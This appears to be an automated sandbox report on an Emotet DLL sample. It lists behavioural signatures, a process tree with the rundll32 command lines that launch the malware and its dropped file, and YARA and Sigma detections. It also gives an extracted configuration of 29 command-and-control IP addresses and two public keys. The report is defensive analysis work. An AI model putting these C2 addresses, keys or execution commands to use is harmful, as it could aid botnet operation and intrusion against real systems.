Loading ...

Play interactive tourEdit tour

Windows Analysis Report mal2.exe

Overview

General Information

Sample Name:mal2.exe (renamed file extension from exe to dll)
Analysis ID:532100
MD5:9efbd03d5576686dd9f0678c09abe9fc
SHA1:0b821e78137018bbf3f9c67d3b049e33d5b36ae5
SHA256:972f9350219dcc2df463f923ec5b559f4ab69f083da9ccbd0976c51bc19f3f5b
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
Sigma detected: Emotet RunDLL32 Process Creation
Changes security center settings (notifications, updates, antivirus, firewall)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Connects to several IPs in different countries
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7004 cmdline: loaddll32.exe "C:\Users\user\Desktop\mal2.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7020 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7064 cmdline: rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6792 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\mal2.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6828 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli",YjMy MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6444 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3344 cmdline: rundll32.exe C:\Users\user\Desktop\mal2.dll,axamexdrqyrgb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 1064 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6216 cmdline: rundll32.exe C:\Users\user\Desktop\mal2.dll,bhramccfbdd MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 3132 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 4932 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6212 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6332 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3276 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4680 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 2904 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 1344 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7120 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7004 -ip 7004 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4152 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7004 -ip 7004 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5172 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4360 cmdline: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4116 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.582902080.00000000003D0000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000000.00000000.583952569.000000000073C000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000000.00000000.582956002.000000000073C000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000002.584098715.000000000348A000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.33f3568.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0.0.loaddll32.exe.3d0000.3.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0.0.loaddll32.exe.3d0000.3.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  0.0.loaddll32.exe.3d0000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    6.2.rundll32.exe.34a3590.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 33 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli",YjMy, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6828, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLL, ProcessId: 6444

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.rundll32.exe.33f3568.1.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: mal2.dllReversingLabs: Detection: 24%
                      Source: mal2.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: mal2.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.594790225.00000000005D3000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594905984.00000000005D3000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594721838.0000000004257000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.594862234.00000000005D9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594794787.00000000005D9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.594862234.00000000005D9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594794787.00000000005D9000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.594790225.00000000005D3000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594905984.00000000005D3000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.596491240.00000000045E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.625997812.0000000005561000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000014.00000002.605555284.0000000000162000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F2FE7 FindFirstFileExW,0_2_6E9F2FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F2FE7 FindFirstFileExW,3_2_6E9F2FE7

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 46.55.222.11:443
                      Source: Malware configuration extractorIPs: 104.245.52.73:8080
                      Source: Malware configuration extractorIPs: 41.76.108.46:8080
                      Source: Malware configuration extractorIPs: 103.8.26.103:8080
                      Source: Malware configuration extractorIPs: 185.184.25.237:8080
                      Source: Malware configuration extractorIPs: 103.8.26.102:8080
                      Source: Malware configuration extractorIPs: 203.114.109.124:443
                      Source: Malware configuration extractorIPs: 45.118.115.99:8080
                      Source: Malware configuration extractorIPs: 178.79.147.66:8080
                      Source: Malware configuration extractorIPs: 58.227.42.236:80
                      Source: Malware configuration extractorIPs: 45.118.135.203:7080
                      Source: Malware configuration extractorIPs: 103.75.201.2:443
                      Source: Malware configuration extractorIPs: 195.154.133.20:443
                      Source: Malware configuration extractorIPs: 45.142.114.231:8080
                      Source: Malware configuration extractorIPs: 212.237.5.209:443
                      Source: Malware configuration extractorIPs: 207.38.84.195:8080
                      Source: Malware configuration extractorIPs: 104.251.214.46:8080
                      Source: Malware configuration extractorIPs: 212.237.17.99:8080
                      Source: Malware configuration extractorIPs: 212.237.56.116:7080
                      Source: Malware configuration extractorIPs: 216.158.226.206:443
                      Source: Malware configuration extractorIPs: 110.232.117.186:8080
                      Source: Malware configuration extractorIPs: 158.69.222.101:443
                      Source: Malware configuration extractorIPs: 107.182.225.142:8080
                      Source: Malware configuration extractorIPs: 176.104.106.96:8080
                      Source: Malware configuration extractorIPs: 81.0.236.90:443
                      Source: Malware configuration extractorIPs: 50.116.54.215:443
                      Source: Malware configuration extractorIPs: 138.185.72.26:8080
                      Source: Malware configuration extractorIPs: 51.68.175.8:8080
                      Source: Malware configuration extractorIPs: 210.57.217.132:8080
                      Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                      Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                      Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                      Source: Joe Sandbox ViewIP Address: 212.237.17.99 212.237.17.99
                      Source: unknownNetwork traffic detected: IP country count 19
                      Source: svchost.exe, 00000005.00000002.627977305.0000017C92263000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.645558527.0000000004D80000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.647849827.0000000004D82000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: WerFault.exe, 00000018.00000002.647603781.0000000003238000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsoft
                      Source: svchost.exe, 00000005.00000002.627977305.0000017C92263000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: Amcache.hve.20.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 0000000A.00000002.445658680.000001F6D4413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com/
                      Source: svchost.exe, 00000008.00000002.785008131.0000020F91447000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.784824630.0000020F91429000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.784824630.0000020F91429000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420087744.000001F6D444D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000002.463794574.000001F6D446B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420041356.000001F6D4469000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.445658680.000001F6D4413000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000002.458236717.000001F6D4450000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420079711.000001F6D444F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000003.420098538.000001F6D4449000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457191441.000001F6D444A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                      Source: svchost.exe, 0000000A.00000003.420087744.000001F6D444D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.420098538.000001F6D4449000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457191441.000001F6D444A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.420098538.000001F6D4449000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.457191441.000001F6D444A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.420109133.000001F6D4447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.420073505.000001F6D4452000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.420113403.000001F6D4442000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.456157837.000001F6D4444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.420122458.000001F6D4443000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=
                      Source: svchost.exe, 0000000A.00000002.455572728.000001F6D4441000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.450549356.000001F6D4429000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.371729055.000001F6D4434000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.454601455.000001F6D443D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000002.454601455.000001F6D443D000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 4.2.rundll32.exe.33f3568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34a3590.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2fd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e43620.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3310000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e43620.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.743608.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2d13590.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.743608.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.7.unpack, type: UNPACKEDPE
